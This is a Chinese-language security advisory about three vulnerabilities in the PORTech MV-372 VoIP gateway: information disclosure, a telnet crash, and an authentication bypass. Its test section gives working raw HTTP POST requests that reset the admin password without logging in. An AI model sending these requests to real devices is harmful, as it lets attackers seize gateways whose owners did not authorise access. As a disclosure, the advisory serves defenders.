Portech MV-372 VoIP网关多个安全漏洞

发布日期:2011-07-05
更新日期:2011-07-05

受影响系统:
PORTech MV-372
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 48560

MV-372是呼叫终端(VoIP到GSM/CDMA/UMTS)和源(GSM/CDMA/UMTS到VoIP)的2通道VoIP GSM/CDMA/UMTS网关。

MV-372在VoIP网关的实现上存在多个安全漏洞,远程攻击者可利用这些漏洞获取敏感信息,造成受影响设备崩溃或通过发送特制的HTTP POST请求绕过某些安全限制。

1)应用程序没有限制对info.htm的访问,可被利用泄露敏感信息。

2)通过提供超长的密码,telnet服务中的错误可被利用造成服务崩溃。

3)管理web界面的身份验证机制没有正确限制密码更改功能的访问,可通过发送特制的请求到web界面更改管理员密码。

<*来源:Zsolt Imre
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST http://&lt;device address&gt;/change.cgi HTTP/1.1
Host: &lt;device address&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&amp;Npass=admin&amp;Nrpass=admin&amp;submit=Submit


POST http://&lt;device address&gt;/save.cgi
Host: &lt;device address&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

建议:
--------------------------------------------------------------------------------
厂商补丁:

PORTech
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.portech.com.tw/p3-product1_1.asp?Pid=14

相关推荐